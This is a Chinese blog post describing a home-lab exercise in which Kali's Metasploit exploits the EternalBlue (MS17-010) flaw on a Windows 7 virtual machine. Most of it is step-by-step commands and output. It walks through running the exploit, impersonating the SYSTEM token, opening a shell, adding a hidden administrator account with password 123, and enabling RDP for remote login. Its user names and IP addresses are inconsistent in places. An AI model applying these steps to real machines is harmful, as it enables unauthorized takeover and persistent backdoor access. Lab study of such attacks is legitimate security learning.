首页 > 系统相关 >kali(安全)-远程获取windows电脑管理员权限实验

kali(安全)-远程获取windows电脑管理员权限实验

时间:2022-10-26 18:03:19浏览次数:73  
标签:windows kali 192.168 管理员 ip 靶机 输入

1、实验环境:vmware

 ​ 安装vmware16软件(一直下一步就行):如果需要输入激活码,跳过即可

  cn_windows_7_ultimate_x64_dvd_x15-66043.iso(靶机系统)

  kali-linux-2020.4-vmware-amd64.7z(系统环境)

2.创建vmware/windows虚拟机 kali(安全)-远程获取windows电脑管理员权限实验_远程连接

详细安装请私聊博主哈​

3.vmware中的win7安装完成后,关闭防火墙kali(安全)-远程获取windows电脑管理员权限实验_ip地址_02kali(安全)-远程获取windows电脑管理员权限实验_linux_03kali(安全)-远程获取windows电脑管理员权限实验_linux_04kali(安全)-远程获取windows电脑管理员权限实验_ip地址_05

查看windows ip地址kali(安全)-远程获取windows电脑管理员权限实验_linux_06kali(安全)-远程获取windows电脑管理员权限实验_ip地址_07

ipconfig #简略信息
ipconfig /all #详细信息
查看自己虚拟机的ip地址,也是靶机地址一般是一个192.开头的内网地址

5.配置系统kali虚拟机

kali官网下载地址:​https://www.kali.org/​

下载好vm安装包之后配置好登录后进入系统中,欢迎来到kali测试系统kali(安全)-远程获取windows电脑管理员权限实验_远程连接_08

打开终端(类似于windows cmd,但是功能更强大)kali(安全)-远程获取windows电脑管理员权限实验_ip地址_09

进入kali系统命令终端kali(安全)-远程获取windows电脑管理员权限实验_ip地址_10

ping 检查网络是否通畅

ping 10.0.0.130 #假设windows靶机虚拟机ip是10.0.0.130,大家的可能是192开头的
如果没有提示,就是不通,需要解决

ctrl+c取消当前操作

#如果你执行的命令卡住了,或者想取消就按ctrl+c(Linux快捷键)

ip a

#查看卡里ip地址 注意有空格!!!!
#如果连接Xshell则需要启动ssh服务
能ping通,但是ssh连不上,执行sudo /etc/init.d/ssh start,输入kali密码。

​msfconsole ###测试环境

功防演练

环境说明

系统

IP

作用

windows 7系统

需要自己通过ipconfifig检查 192.168.10.138

靶机,用来演练

kali系统

ip a查看ip地址192.168.10.137

用来进行测试

步骤

检查windows环境及基本信息

​防火墙是否关闭(检查步骤和关闭步骤一致)

查看windows系统ip地址

ipconfig

kali(安全)-远程获取windows电脑管理员权限实验_linux_11

检查kali系统

​检查kali是否能ping通windows系统

在kali终端下面操作

ping 192.168.10.138 #注我的windows ip通过查询是192.168.10.138

​如果结果中有个 time=xx ms 表示通了,==恭喜==, ==注意linux下面ping命令默认不会停止需要

ctrl+c停止==kali(安全)-远程获取windows电脑管理员权限实验_ip地址_12kali(安全)-远程获取windows电脑管理员权限实验_远程连接_13

开始

这里利用win7永恒之蓝漏洞(后来被人开发出来的),进行演练

打开kali系统终端,终端中输入 msfconsole 回车 ==注: 这里的进入后图形是随机的== kali(安全)-远程获取windows电脑管理员权限实验_linux_14

然后我们要查询永恒之蓝对应的漏洞:叫ms17-010 使用 search ms17-010 ==注意减号kali(安全)-远程获取windows电脑管理员权限实验_linux_15

​弹出很多,这里我们用序号是2的漏洞,注:一般来说每个漏洞利用方式不同,也需要搭建不同环境,这里

别选错了

使用2号漏洞 use 2 回车即可 kali(安全)-远程获取windows电脑管理员权限实验_远程连接_16

​你会发现命令行,有红色的内容了,就是我们刚刚选择的漏洞

对于漏洞我们要进行基础设置才能用 输入 options 回车kali(安全)-远程获取windows电脑管理员权限实验_ip地址_17

​这里要修改的是 RHOSTS 你的目标是哪个机器 输入 set RHOSTS 192.168.10.138 因为我们已

经知道windows ip是192.168.10.138 ==RHOSTS 写为小写的也行==

发现里面的 RHOSTS已经被修改了kali(安全)-远程获取windows电脑管理员权限实验_远程连接_18

​可以开始测试了 输入 run

屏幕会有很多提示和输出 等待出现 ==WIN==即为成功kali(安全)-远程获取windows电脑管理员权限实验_远程连接_19

到这里其实已经进入到靶机成功了.

但是权限还不够,输入 use incognito 进入提权模式

输入sysinfo可查看靶机的信息
Computer : HH-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
#进入提权模式
meterpreter > use incognito
Loading extension incognito...Success.
#查看可用权限
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-2VJGDUILMF1\oldboy
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
#切换到system权限,注意加上双引号
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

实践操作创建截图:

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_20

但是目前还没有办法在远程机器上面执行命令(windows命令)

需要输入 shell 命令后回车

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_21

查IP发现已经登录到win7靶机中,创建一个用户,输入 net user admin 123 /add 用户名是admin

密码123 kali(安全)-远程获取windows电脑管理员权限实验_ip地址_22

可以输入 net user 检查是否有新用户oldboy

C:\Windows\system32>net user test 123 /add
�����ɹ����ɡ�
C:\Windows\system32>net user ##查看用户
net user
\\ ���û��ʻ�
---------------------------------------------------------------------------
----
Administrator Guest oldboy test
�����������ϣ�������һ��������������
C:\Windows\system32>net localgroup administrators admin /add #将admin用户添加
为管理

kali(安全)-远程获取windows电脑管理员权限实验_linux_23

最后去靶机windows7下面检查下是否已经建立管理员成功

       单击自己头像,开始----计算机---右键----管理kali(安全)-远程获取windows电脑管理员权限实验_远程连接_24kali(安全)-远程获取windows电脑管理员权限实验_远程连接_25

此时注销当前账号,可以使用test用户登录管理系统了。

开启win虚拟机3389端口远程连接靶机,开始”为所欲为“

1.开启靶机3389端口远程连接靶机,开始”为所欲为“。

##退出c盘环境
C:\Windows\system32>exit
exit
##激活靶机远程桌面功能
meterpreter > run post/windows/manage/enable_rdp ##激活靶机远程桌面功能
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it
to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file:
/home/kali/.msf4/loot/20210924045219_default.txt

kali(安全)-远程获取windows电脑管理员权限实验_linux_26

2.在电脑windows宿主机

- win+徽标键进入运行窗口-输入cmd回车
C:\Users\oldboy>ping 192.168.10.138 -t #测试到靶机是否通畅
正在 Ping 10.0.0.132 具有 32 字节的数据:
来自 10.0.0.132 的回复: 字节=32 时间<1ms TTL=128
来自 10.0.0.132 的回复: 字节=32 时间<1ms TTL=128

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_27


3.开启远程连接后,远程连接靶机(使用创建的test管理员,密码123)**

进入运行窗口-输入mstsc回车,开启远程桌面客户端。
输入靶机Ip地址连接

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_28kali(安全)-远程获取windows电脑管理员权限实验_远程连接_29

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_30





标签:windows,kali,192.168,管理员,ip,靶机,输入
From: https://blog.51cto.com/wsw1026/5798127

相关文章